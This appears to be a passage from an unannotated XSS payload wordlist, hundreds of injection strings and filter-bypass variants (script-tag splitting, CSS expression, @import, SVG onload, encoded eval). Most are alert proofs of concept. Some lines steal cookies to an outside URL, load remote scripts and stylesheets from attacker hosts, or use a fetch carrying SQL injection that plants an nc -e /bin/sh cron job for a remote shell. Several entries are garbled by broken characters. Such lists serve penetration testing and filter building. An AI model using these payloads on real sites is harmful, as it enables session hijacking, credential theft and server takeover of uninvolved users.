<scr<script>ipt>alert(/Xss/)</scr</script>ipt>
<scr<script>ipt>alert(‘XSS’)</scr</script>ipt>
<scr<script>ipt>alert(‘XSS’)</scr<script>ipt>
<scr<script>ipt>alert(‘XSS’);</scr</script>ipt>
<scr<script>ipt>alert(“XSS”)</scr<script>ipt>
</scr</script>ipt><ifr<iframeame/onload=prompt()>whs
<scr<script>ipt>prompt(document.cookie)</scr</script>ipt>
<scr<script>rip>alalertert</scr</script>rip>
<sc<script>ript>alert(123)</sc</script>ript>
<sc<script>ript>alert(1)</script>
<select autofocus onfocus=alert`1`
<select autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>//INJECTX
<select id=XSS onfocus=javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus><select onchange=alert(1)><option>1<option>2
<select onchange=alert(106)><option>1<option>2
<select onchange=alert(1)><option>1<option>2
<select onclick=”popup=1;”>
<select onclick=popup=1;>
‘></select><script>alert(123)</script>
‘></select><script>alert(123)</script>
‘></select><script>alert(XSS)</script>
<set attributeName=”onmouseover” to=”alert(1)”/>
<set attributeName=”xlink:href” to=”javascript:alert(1)” begin=”1s” />
Set.constructor(‘ale’+’rt(13)’)();
Set.constructor`alert\x28document.domain\x29```
Set.constructor`al\x65rt\x2814\x29```;
setImmediate()
setinterval()
setInterval(‘ale’+’rt(10)’);
setInterval`alert\x28document.domain\x29`
setInterval(code, 0)
setInterval(‘location.hash=”??????????”[i++%10]’,i=99)
setInterval(location.search.slice(1));
setInterval(x,5000);
setTimeout()
setTimeout`alert(1);//${1000}`
setTimeout(‘ale’+’rt(2)’);
setTimeout([‘alert(/@garethheyes/)’]);
setTimeout`alert\x28document.domain\x29`
setTimeout([‘confirm(4)’]);
setTimeout(location)
setTimeout(location.search.slice(1));
setTimeout// (name// ,0)
setTimeout(URL.slice(-7))//#alert()
<<! — #set var=”x” value=”svg onload=alert(54)” →<! — #echo var=”x” →>
<ShowAbout>1</ShowAbout>
<ShowDuration>1</ShowDuration>
<ShowElapsedTime>1</ShowElapsedTime>
<ShowFFRW>1</ShowFFRW>
<ShowLoadingMov>1</ShowLoadingMov>
Single Input (script-based)
?skinName=asfunction:getURL,javascript:alert(1)//”,
/*! SLEEP(1) /*/ onclick=alert(1)//<button value=Click_Me /*/*/ or’ /*! or SLEEP(1) or /*/, onclick=alert(1)//> /*/*/’or” /*! or SLEEP(1) or /*/, onclick=alert(1)// /*/*/”? /*
/*! SLEEP(1) /*/ onclick=alert(1)//<button value=Click_Me /*/*/ or’ /*! or SLEEP(1) or /*/, onclick=alert(1)//> /*/*/’or” /*! or SLEEP(1) or /*/, onclick=alert(1)// /*/*/”? /*
<slideslow><image img=javascript:alert(XSS@%2Bdocument.domain caption= /></slideshow>
<s[NULL]cript>confirm(1)</s[NULL]cript>’>Clickme</a>
;&sol;script&gt;
<s/onclick=alert()>b
source+location.hash[1]+1+location.hash[2]>#()
source+location.hash.substr(1)>#(1)
<source onclick=popup=1; ><frameset/onload=popup=1;>
{“source”:{},”__proto__”:{“source”:”$`onerror=prompt(1)>”}}
<source srcset=”x”><img onerror=”confirm(5)”></picture>
Space Insertion##<script%20TEST>alert(1)</script%20TESTTEST>
<span class=”pln”></span><span class=”tag”>&lt;formaction</span><span class=”pun”>=</span><span class=”atv”>&amp;#039;data:text&amp;sol;html,&amp;lt;script&amp;gt;alert(1)&amp;lt/script&amp;gt&amp;#039;</span><span class=”tag”>&gt;&lt;button&gt;</span><span class=”pln”>CLICK</span>
<span class=”pln”> </span><span class=”tag”>&lt;formaction</span><span class=”pun”>=</span><span class=”atv”>&amp;#039;data:text&amp;sol;html,&amp;lt;script&amp;gt;alert(1)&amp;lt/script&amp;gt&amp;#039;</span><span class=”tag”>&gt;&lt;button&gt;</span><span class=”pln”>CLICK</span>
<span class=”qm_ico_print” id=”mail_print” title=”L” onclick=”window.open(‘/cgi-bin/readmail?sid=SC_hEOi3h_nqEgJQ&amp’);”></span>
<SPAN class=xmsw title=dd onmouseout=javascript:alert(document.cookie)>test</SPAN>
<span class=”xmsw” title=”dd” onmouseout=window.location=’http://test/test.php?c='+document.cookie>test</span>
<SPAN class=xmsw title=dd onmouseout=window.location=’http://www,xfydyt.com'>test</span>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<SPAN DATASRC=”#xss” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN>
<span id=”x” data-constructor=oops></span><script>confirm(x.dataset.constructor)</script>
<span onclick=”javascript:changeFont(2);”>
<span/onmouseover=confirm(1)>renwax23
“></span><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,120,46,99,111,47,120,105,72,118,62,60,47,115,99,114,105,112,116,62));</script><span>
<SPAN “ style=”display: block; position: absolute; top: 0; left: 0; width: 9999px; height: 9999px; z-index: 9999" foo=”></span>renwax23
SRC=&#10<IMG 6;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
‘/src=[^<]*base64[^<]*(?=\>)/Uis’,
“src=data:,alert%2823%29></script><script x=”
SRC’” →<! — #exec cmd=”/bin/echo
src=”http://www.site.com/XSS.js"></script>
src=”http://www.site.com/XSS.js"></script>
<sRCIpt>alert(/123/)</ScRpT>
src=JaVaSCript:prompt(132)
<s<script>cript>…</s</script>cript>
[S] = stripped char or string
sstyle=foobar”tstyle=”foobar”ystyle=”foobar”lstyle=”foobar”estyle=”foobar”=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a=”
{!/\s/.test(‘\u0085’)&&eval(‘\u0085alert(“IE”)’)}catch(e){alert(‘Not IE’)}
stop, open, print && confirm(1)
String.fromCharCode(0x61,0x62)
String.fromCharCode(0xffff+0x3d)
(String.fromCharCode(97,108,101,114,116,40,39,104,105,39,41))
String.raw(a=alert(1),1,2)
String.raw`jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e`;
<% string str_a = rrequest.getParameter(“a”);%>
</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(
</style &#32;><script &#32; :-(>/**/confirm(document.location)/**/</script &#32; :-(
“+style%3d”x%3aexpression(alert(1))+
<STYLE>a{background:url(‘s1’ ‘s2)}@import javascript:javascript:alert(1);’);}</STYLE>
/style=a:expression&#40&#47&#42'/-
<STYLE><! — a{< img src=</STYLE>;x:expression(eval(myxsxxcd.title));<style>} →</style></DIV>
<STYLE> a { width: expression(alert(‘XSS’)) } </STYLE>
<style>*{background-image:url(‘\6A\61\76\61\73\63\72\69\70\74\3A\61\6C\65\72\74\28\6C\6F\63\61\74\69\6F\6E\29’)}</style><% style=behavior:url(: onreadystatechange=alert(1)>
<style>body:after{content: ��\61\6c\65\72\74\28\31\29��}</style><script>eval(eval(document.styleSheets[0].cssRules[0].style.content))</script>
<style>body{background-color:expression\(alert(1))}</style>
<style>body { background-image:url('http://www.blah.com/</style><script>alert(1)</script>'); }</style>
<style>body{font-size: 0;} h1{font-size: 12px !important;}</style><h1><?php echo “<hr />THIS IMAGE COULD ERASE YOUR WWW ACCOUNT, it shows you the PHP info instead…<hr />”; phpinfo(); __halt_compiler(); ?></h1>
<;STYLE>;BODY{-moz-binding:url(“;http://ha.ckers.org/xssmoz.xml#xss";)}<;/STYLE>;
<STYLE>BODY{-moz-binding:url(“http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<style>BODY{-moz-binding:url(“http://www.securitycompass.com/xssmoz.xml#xss")}</style>
<STYLE>BODY{-moz-binding:url(“http://xxxx.com/xssmoz.xml#xss")}</STYLE>
<style>body{width:��xpression(parent.document.write(unescape(‘%3Cscript%20src%3Dhttp%3A//xssor.io/phishing/%3E%3C/script%3E’)));}</style>
style=color: expression(alert(0));” a=”
/style=[^<]*((expression\s*?[<]??)|(behavior\s*:))[^<]*(?=\>)/Uis
/style=[^<]*((expression\s*?\([^<]*?\))|(behavior\s*:))[^<]*(?=\>)/Uis
‘/style=[^<]*((expression\s*?\([^<]*?\))|(behavior\s*:))[^<]*(?=\>)/Uis’,
<style>*{font-family:’Serif}’;x[value=expression(confirm(URL=1));]{color:red}</style>
<style>img{background-image:url(‘javascript:alert(location)’)}</style>
<style><img src=”</style><img src=x “><object data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”></object>
<style><img src=”</style><img src=x onerror=alert(1)//”>
<style><img src=”</style><img src=x onerror=alert(123)//”>
“<style><img src=’</style><img src=x onerror=alert(“document.cookie”)//’>
<style><img src=”</style><img src=x onerror=alert(XSS)//”>
<style><img src=”</style><img src=x onerror=javascript:alert(1)//”>
<style>@import ‘//attacker/test.css’</style>
<STYLE>@import’%(css)s’;</STYLE>
<style>*[{}@import’%(css)s?]</style>X
<style>@import “data:,*%7bx:expression(javascript:alert(1))%7D”;</style>
<style>@import “data:,*%7bx:expression(write(1))%7D”;</style>
<style>@import//evil? >>>steal me!<<< scriptless
<;STYLE>;@import’;http://ha.ckers.org/xss.css';;<;/STYLE>;
<STYLE>@import’http://ha.ckers.org/xss.css';</STYLE>
<STYLE>@importhttp://ha.ckers.org/xss.css;</STYLE>;
<STYLE>@import’http://host/css';</STYLE>
<style>@import’http://www.securitycompass.com/xss.css';</style>
<STYLE>@import’http://xss.cx/xss.css';</STYLE>
<STYLE>@import’http://xxxx.com/xss.css';</STYLE>
<STYLE>@importjavasc ipt:alert(“XSS”);</STYLE>
<STYLE>@im\port’\ja\vasc\ript:alert(“X3SS”)’;</STYLE>
<style>@im\port’\ja\vasc\ript:alert(“xss”)’;</style>
<style>@import javascript:alert(xss);</style>
<style>@im\port’\ja\vasc\ript:alert(\”XSS\”)’;</style>
<style>@import’javascript:alert(“XSS”)’;</style>
<;STYLE>;@im\port’;\ja\vasc\ript:alert(“;XSS”;)’;;<;/STYLE>;
<STYLE>@im\port’\ja\vasc\ript:alert(“XSS”)’;</STYLE>
<STYLE>@import’javascript:alert(“XSS”)’;</STYLE>
“><STYLE>@import”javascript:alert(‘XSS’)”;</STYLE>
“><STYLE>@import”javascript:alert(‘XSS’)”;</STYLE>>”’><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
<STYLE>@im\port’\ja\vasc\ript:confirm(document.location)’;</STYLE>
“><STYLE>@import”javascript:confirm(document.location)”;</STYLE>
<style>@im\port’\ja\vasc\ript:document.vulnerable=true’;</style>
<style>*[{}@import’test.css?]{color: green;}</style>X
<style>@imp\ort url(“http://attacker.org/malicious.css");</style>
<style>jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e</style>
<style>@keyframes x{}</style>
<style>@KeyFrames x{</style><div style=animation-name:x onanimationstart=alert(1)> <
<style>@KeyFrames z{</style><div style=animation-name:z onanimationend=&#97&#108&#101&#114&#116&grave;1&grave;> %253Cscript%253Ealert(‘XSS’)%253C%252Fscript%253E “</script><script>alert(String.fromCharCode(88,83,83))</script> <IMG SRC=x onload=”alert(String.fromCharCode(88,83,83))”> <IMG SRC=x onafterprint=”alert(String.fromCharCode(88,83,83))”>
<STYLE>li+{list-style-image:url(“javascript:alert(1)”);}</STYLE><UL><LI>1
<;STYLE>;li {list-style-image: url(“;javascript:alert(&#39;XSS&#39;)”;);}<;/STYLE>;<;UL>;<;LI>;XSS
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’);</STYLE><UL><LI>XSS
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
<STYLE>li {list-style-image: url(“javascript:alert(XSS)”);}</STYLE><UL><LI>XSS
<STYLE>li {list-style-image: url(\”javascript:alert(‘XSS’)\”);}</STYLE><UL><LI>XSS
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS</br>
<style>li {list-style-image: url(“javascript:document.vulnerable=true;”);</STYLE><UL><LI>XSS
<STYLE>li {list-style-image: url(“javascript:javascript:alert(1)”);}</STYLE><UL><LI>XSS
<style/>&lt;/style&gt;&lt;img src=1 onerror=confirm(1)&gt;</style>
style=-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a=”
<style>*{-o-link:’data:text/html,<svg/onload=confirm(5)>’;-o-link-source:current}</style><a href=1>aaa
<style/onload=confirm(1)>
<style/onload = !-confirm&#x28;1&#x29;>
<style onload=’execScript(“InputBox+1”,”VbScript”);’>
<style/onload=”javascript:if(‘[object Object]’=={}&&1==[1])confirm(1);”>
<style/onload=&lt;! — &#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
<style/onload=&lt;! — &#09;&gt;&#10;confirm&#10;&lpar;1&rpar;>
<style/onload=&lt;! — &gt; alert &lpar;1&rpar;>
<style/onload=prompt&#40;’&#88;&#83;&#83;’&#41;
<style/onload=prompt(‘XSS’)
<style onLoad style onLoad=”javascript:javascript:alert(1)”></style onLoad>
<style onreadystatechange=javascript:javascript:alert(1);></style>
<style onReadyStateChange style onReadyStateChange=”javascript:javascript:alert(1)”></style onReadyStateChange>
<style>p[foo=bar{}*{-o-link:’javascript:alert(1)’}{}*{-o-link-source:current}*{background:red}]{background:green};</style>
<style>p[foo=bar{}*{-o-link:’javascript:confirm(1)’}{}*{-o-link-source:current}*{background:red}]{background:green};</style>
<style>p[foo=bar{}*{-o-link:’javascript:javascript:alert(1)’}{}*{-o-link-source:current}]{color:red};</style>
}</style><script>a=eval;b=alert;a(b(/i/.source));</script>
}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
</style><script>a=eval;b=alert;a(b(/XSS/.source));</script><script>a=eval;b=alert;a(b(/XSS/.source));</script>’”><marquee><h1>XSS by vuolent python</h1></marquee>
</style ><script :-(>/**/alert(document.location)/**/</script :-(
</style></script><script>alert(0x000123)</script>
‘</style></script><script>alert(0x000123)</script>
‘\” →</style></script><script>alert(0x000123)</script>
\”></style></script><script>alert(0x000123)</script>
\”>’</style></script><script>alert(0x000123)</script>
</style></scRipt><scRipt>alert(1)</scRipt>
‘“ →</style></scRipt><scRipt>alert(‘XSSPOS ED’)</scRipt>
“ →</style></script><script>alert(“XSS”)</script>
<///style///><span %2F onmousemove=’alert&lpar;1&rpar;’>SPAN
<///style///><span %2F onmousemove=’confirm&lpar;1&rpar;’>SPAN
<style><! — </style><script>alert(‘XSS’);// →</script>
<style><! — </style><script>document.vulnerable=true;// →</script>
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
<style></style\x09<img src=”about:blank” onerror=javascript:alert(1)//></style>
<style></style\x0A<img src=”about:blank” onerror=javascript:alert(1)//></style>
<style></style\x0D<img src=”about:blank” onerror=javascript:alert(1)//></style>
<style></style\x20<img src=”about:blank” onerror=javascript:alert(1)//></style>
<style></style\x3E<img src=”about:blank” onerror=javascript:alert(1)//></style>
<style>//<! — </style> →*{x:expression(alert(/@jackmasa/))}//<style></style>
<style>//<! — </style> →*{x:expression(confirm(4))}//<style></style>
<style>#test{x:expression(alert(/XSS/))}</style>
</stYle/</titLe/</teXtarEa/</scRipt/ — !>
<STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘X7SS’)”)}</STYLE>
<;STYLE type=”;text/css”;>;BODY{background:url(“;javascript:alert(‘;XSS’;)”;)}<;/STYLE>;
<STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
<STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
<STYLE type=”text/css”>BODY{background:url(“javascript:alert(XSS)”)}</STYLE>
<STYLE type=”text/css”>BODY{background:url(“javascript:confirm(document.location)”)}</STYLE>
<style type=”text/css”>BODY{background:url(“javascript:document.vulnerable=true”)}</style>
<STYLE type=”text/css”>BODY{background:url(“javascript:javascript:alert(1)”)}</STYLE>
<style type=text/css>@import url(http://www.xxx.com/xss.css);</style>
<STYLE TYPE=”text/css”>.XSS{background-image:url(“javascript:alert(‘X6SS’)”);}</STYLE><A CLASS=XSS></A>
<STYLE TYPE=”text/css”>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
<STYLE TYPE=”text/javascript”>alert(‘X4SS’);</STYLE>
<STYLE TYPE=”text/javascript”>alert(“XSS”)
<;STYLE TYPE=”;text/javascript”;>;alert(‘;XSS’;);<;/STYLE>;
<STYLE TYPE=”text/javascript”>alert(‘XSS’);</STYLE>
<STYLE TYPE=”text/javascript”>alert(XSS);</STYLE>
<STYLE TYPE=”text/javascript”>confirm(document.location);</STYLE>
<style type=”text/javascript”>document.vulnerable=true;</style>
<style TYPE=”text/javascript”>document.vulnerable=true;</style>
<STYLE TYPE=”text/javascript”>javascript:alert(1);</STYLE>
<STYLE>width:expression(alert(‘anyunix’));</STYLE>
<style>*{x:���A����������������(javascript:alert(1))}</style>
<style>*{x:A(javascript:alert(1))}</style>
<style>*{x:A(write(1))}</style>
<style>#x{display:block}#x:target{display:none}@keyframes test {}</style>
<// style=x:expression\28javascript:alert(1)\29>
<// style=x:expression\28write(1)\29>
<// style=x:expression\28write(1)\29>
</**/style=x:expression\28write(1)\29>
<// style=x:expression\28write(1)\29> // Works upto IE7 ?http://html5sec.org/#71
<style>//*{x:expression(alert(/xss/))}//<style></style>
<;STYLE>;.XSS{background-image:url(“;javascript:alert(‘;XSS’;)”;);}<;/STYLE>;<;A CLASS=XSS>;<;/A>;
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
<STYLE>.XSS{background-image:url(“javascript:alert(XSS)”);}</STYLE><A CLASS=XSS></A>
<STYLE>.XSS{background-image:url(“javascript:confirm(document.location)”);}</STYLE><A CLASS=XSS></A>
<style>.XSS{background-image:url(“javascript:document.vulnerable=true”);}</STYLE><A CLASS=XSS></a>
<STYLE>.XSS{background-image:url(“javascript:javascript:alert(1)”);}</STYLE><A CLASS=XSS></A>
style=\”xss:’” onclick=”alert(1)//’”
style=xss:’”/onclick=alert(1)//’
{{(_=’’.sub).call.call({}[$=’constructor’].getOwnPropertyDescriptor(_.__proto__,$).value,0,’alert(1)’)()}}
{{(_=””.sub).call.call({}[$=”constructor”].getOwnPropertyDescriptor(_.__proto__,$).value,0,”alert(1)”)()}}
<svg
<svg%09%0A%0B%0C%0D%A0%00%20onload
<svg%09%28%3Bonload=confirm(1);>
<svg %09onload%09=prompt(1)>
<svg%0Ao%00nload=%09((pro\u006dpt))()//
<svg%20onload=eval%28%27/*%27%2bURL%29>#*/alert%28document.domain%29
<svg%20onload=eval(unescape(location))><title>*/;alert(2);function%20text(){};function%20html(){}
<svg%20onload=evt.target.innerHTML=evt.target.ownerDocument.URL>#<img src=/ onerror=alert(domain)>
<svg[9,10,12,13,32,47]onload=alert(1)>
<svg><animate attributename=x end=180 onend=alert(180)>
<svg><animate attributename=x end=188 onend=alert(188)>
<svg><animate attributename=x end=1 onend=alert(44)>
<svg><animate attributeName=x onbegin=alert(190)>
<svg><animate href=#k attributename=href to=/ from=data:,alert(60)><script/id=k></script>
<svg><animate onbegin=alert(189)>
<svg><animate onbegin=alert(45)> <svg><animate attributeName=x onbegin=alert(450)>
<svg><animate xlink:href=#x attributeName=href values=&#106;avascript:alert(1) /><a id=x><rect width=100 height=100 /></a>
<svg><animation x:href=javascript:alert(1)>
“><svg/a=#”onload=’/*#*/prompt(1)’
<svg><a><rect width=100% height=100%>
<svg><a><rect width=100% height=100%><animate attributeName=href from=//google.com to=?>
<svg><a><rect width=100% height=100% /><animate attributeName=href to=//google.com>
<svg><a><rect width=100% height=100% /><animate attributeName=href to=javas&#99ript:alert(1)>
<svg><a><rect width=100% height=100%><animate attributeName=width from=0 to=100% dur=2s>
<svg><a><script>alert(1)</a>
<svg><a xlink:href=”javascript:alert(1)”><rect width=”1000" height=”1000" fill=”white”/>click</a></svg>
<svg><a xml:base=”javascript:alert(1)//” href=”#”><circle r=”100" /></svg>
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(176) to=&>
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=%26>
<svg><![CDATA[><image xlink:href=”]]><img src=xx:x onerror=alert(2)//”></svg>
<svg><![CDATA[><imagexlink:href=”]]><img/src=xx:xonerror=alert(2)//”</svg>
<svg><![CDATA[><imagexlink:href=”]]><img/src=xx:xonerror=alert(2)//”></svg>
<Svg> <! [CDATA [> <imagexlink: href = “]]> <img / src = xx: xonerror = alert (2) //”> </ svg>
<svg><![CDATA[><imagexlink:href=”]]><img/src=xx:xonerror=alert(2)//”></svg> // By Secalert
<svg contentScriptType=text/vbs><script>
<svg contentScriptType=text/vbs><script>MsgBox
<svg contentScriptType=text/vbs><script>MsgBox+1
<svg contentScriptType=text/vbs><script>MsgBox”1"<i>
<svg contentScriptType=text/vbs><script>XSS
<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
<svg><div onactivate=alert(‘Xss’)
<svg><div onactivate=alert(‘Xss’) id=xss style=overflow:scroll>
<svg><doh onload=confirm(1)>
<svgEonload=alert(1)>
<svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>
<svg id=1 onload=confirm(1)>
<svg id=alert(1337) onload=eval(id)>
<svg id=alert(1) onload=eval(id)>
<svg id=javascript:alert(1337) onload=location=id>
<svg id=?p=<script/src=//3237054390/1%2B onload=location=id>
<svg id=?p=<svg/onload=alert(1)%2B onload=location=id>
<svg id=t:alert(1) name=javascrip onload=location=name+id>
<svg><image x:href=”data:image/svg-xml,%3Csvg xmlns=’http://www.w3.org/2000/svg' onload=’alert(1)’%3E%3C/svg%3E”>
<svg><image x:href=”data:image/svg-xml,%3Csvg xmlns=’http://www.w3.org/2000/svg' onload=’confirm(1)’%3E%3C/svg%3E”>
<svg/language=vbs onload=msgbox-1
<svg onclick=popup=1;>
<svg/onload%0B=prompt(1)>
<SVG/ONLOAD=&#112&#114&#111&#109&#112&#116(1)
<SVG/ONLOAD=&#112&#114&#111&#109&#112&#116(1) // Cross Browser
<svg </onload =”1> (_=alert,_(1)) “”>
<svg </onload =”1> (_=alert,_(1337)) “”>
<svg/onload=%26%23097lert%26lpar;1337)>
<SVG ONLOAD=&#97&#108&#101&#114&#116(1)>
<SVG ONLOAD=&#97&#108&#101&#114&#116(186)>
<SVG ONLOAD=&#97&#108&#101&#114&#116(47)>
<svg+onload=+”aler%25%37%34(1)”
<! →<svg onload=alert(1)> →
<svg onload=”alert(1)”
<svg onload=alert`1`>
<svg onload=alert(1)>
<svg onload=alert(1)//
<svg/onload=alert(1)
?�֡�svg onload��alert�]1�^��
“><svg onload=alert(1)>
“><svg onload=alert(1)//
\<svg/onload=alert`1`\>
<Svg OnLoad=alert(1)>
?�֡�svg onload��alert�]183�^��
<svg onload=(alert)(1) >//INJECTX
<svg/onload=alert(1)>//INJECTX
<svg onload=alert&#40;1&#41>
‘<’s’v’g’ o’n’l’o’a’d’=’a’l’e’r’t’(‘7’)’ ‘>’
<svg onload=alert(75)>
“><svg onload=alert(76)//
<svg/onload=alert(domain)>
<svg/onload=alert`INJECTX`>
<svg/onload=alert(`INJECTX`)>
<svg/onload=alert(/INJECTX/)>
<svg onload=alert&lpar;1&rpar;>
<svg onload=alert(navigator.battery.charging)>
<svg onload=alert(navigator.battery.dischargingTime)>
<svg onload=alert(navigator.battery.level)>
<svg onload=alert(navigator.connection.type)>
<svg/onload=alert(String.fromCharCode(88,83,83))>
“><svg/onload=alert(String.fromCharCode(88,83,83))>
<svg onload=alert(tagName)>
<svg onload=alert&#x28;1&#x29>
<svg onload=alert(‘XSS’)>
<svg/onload=alert(‘XSS’)>
“><svg/onload=alert(/XSS/)
<svg/onload=body[name]=URL%0d#</svg><img src=x onerror=alert(1)>”
<svg/onload=confirm(0);prompt(0);>
“<svg/onload=confirm(0);prompt(0);>”
<svg onload=confirm(1)
<svg/onload=confirm(1)
“><svg/onload=confirm(58)>”@x.y
<svg onload=”confirm(7)”>
“><svg onload=”confirm(7)”>
“/><svg/onload=confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83));prompt(0)>
“\”/><svg/onload=confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83));prompt(0)>”
“><svg/onload=co\u006efir\u006d`1`>
<svg+onload=+”[DATA]”
<svg/onload=document.location.href=’data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=’>
<svg/onload=document.location.href=’https://google.com'>
<svg onload=document.writeln(decodeURI(location.hash))>#<img src=1 onerror=alert(1)>
<svg onload=document.write(‘XSS’)>
<svg/onload=eval(atob(location.hash.slice(1)))>
<svg/onload=eval(atob(location.hash.slice(1)))>#d2l0aChkb2N1bWVudClib2R5LmFwcGVuZENoaWxkKGNyZWF0ZUVsZW1lbnQoL3NjcmlwdC8uc291cmNlKSkuc3JjPWF0b2IoL0x5OWljblYwWld4dloybGpMbU52YlM1aWNpOHkvLnNvdXJjZSk=
<svg/onload=eval(atob(location.hash.slice(1)))>#YWxlcnQoMSkvLw==
<svg/onload=eval(atob(URL.slice(-148)))>
<svg/onload=eval(atob(URL.slice(-148)))>#d2l0aChkb2N1bWVudClib2R5LmFwcGVuZENoaWxkKGNyZWF0ZUVsZW1lbnQoL3NjcmlwdC8uc291cmNlKSkuc3JjPWF0b2IoL0x5OWljblYwWld4dloybGpMbU52YlM1aWNpOHkvLnNvdXJjZSk=
<svg onload=eval(document.cookie)>
<svg onload=eval(location.hash.slice(1)>#alert(1)
<svg/onload=eval(location.hash.slice(1))>?#alert(1)
<svg/onload=eval(location.hash.slice(1))>#with(document)
<svg/onload=eval(location.hash.slice(1))>#with(document)body.appendChild(createElement(‘script’)).src=’//DOMAIN’
<svg+onload=eval(location.hash.substr(1))>#alert(1)
<svg/onload=eval(name)>
<svg onload=eval(URL)>
<svg onload=eval(URL)>//22
<svg onload=eval(‘/*’+URL)>#*/alert(document.domain)
<svg+onload=eval(URL.slice(7,15))>
<svg/onload=eval(URL.slice(-7))//#alert()
<svg onload=eval(URL.slice(-8))>#alert(1)
<svg onload=eval(URL.slice(-8))>#alert(1)/”’></script /K><Svg /onload = confirm(`1`)
<svg onload=eval(window.name)>
<svg onload=eval(window.name)//
<svg onload=evt.target[/innerHT/.source%2b/ML/.source]=evt.target[/ownerDocumen/.source%2b/t/.source][/U R/.source%2b/L/.source]#<img src=/ onerror=alert(domain)>
<svg onload=evt.target[/innerHT/.source%2b/ML/.source]=evt.target[/ownerDocumen/.source%2b/t/.source][/UR/.source%2b/L/.source]#<img src=/ onerror=alert(domain)>
<svg onload=fetch(“//HOST/?id=0+union+select’*+*+*+*+*+root+/bin/nc+-lp53+-e+/bin/sh’into+outfile’/etc/cron.d/s’”)>
<svg onload=innerHTML=location.hash>#<script>alert(1)</script>
<svg/onload=’javascript0x00:void(0)%00?void(0)&colon;confirm(1)’>
<svg onload=”javascript:alert(123)” xmlns=”#”></svg>
<svg onload=”javascript:alert(1)” xmlns=”http://www.w3.org/2000/svg"></svg>
<svg onload=”javascript:alert(9)” xmlns=”http://www.w3.org/2000/svg"></svg>
<svg onload=��javascript:alert(9)�� xmlns=��http://www.w3.org/2000/svg��></svg>
<svg/onload=location=’javas’%2B’cript:’%2B
<svg/onload=location=javas%2Bcript:%2B
<svg onload=location=’javascript:alert(1)’>
<svg/onload=location=’javascript:alert(1)’>
<svg onload=location=’javas’+’cript:’+’ale’+’rt’+location.hash.substr(1)>#(1)
<svg/onload=location=/java/.source+/script/.source+location.hash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.hash[3]//#:
<svg/onload=location=/java/.source+/script/.source+location.hash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.hash[3]#:()
<svg/onload=location=/javas/.source%2B/cript:/.source%2B
<svg/onload=location=/javas/.source%2B/cript:/.source%2B/ale/.source
<svg onload=location=/javas/.source+/cript:/.source+/ale/.source+/rt/.
<svg onload=location=/javas/.source+cript:/.source+/ale/.source+/rt/.
<svg onload=location=location.hash.substr(1)>#javascript:alert(1)
<svg/onload=location=location.hash.substr(1)>#javascript:alert(1)
<svg/onload=location=name//>
<svg/onload=location=name//
<svg/onload=location=name//>CLICK</a>
<svg/onload=location=name//��>CLICK</a>
<svg+onload=location=URL.slice(7,26)>
<svg/onload=location=window[`atob`]`amF2YXNjcmlwdDphbGVydCgxKQ==`;//
<svg onload=navigator.vibrate(500)>
<svg onload=navigator.vibrate([500,300,100])>
<svg/onload=parent[/loca/.source%2b/tion/.source]=name//
<svg onload=popup=1;>
<svg/onload=prompt(0);>
“<svg/onload=prompt(0);>”
<svg/onload=prompt(1);>
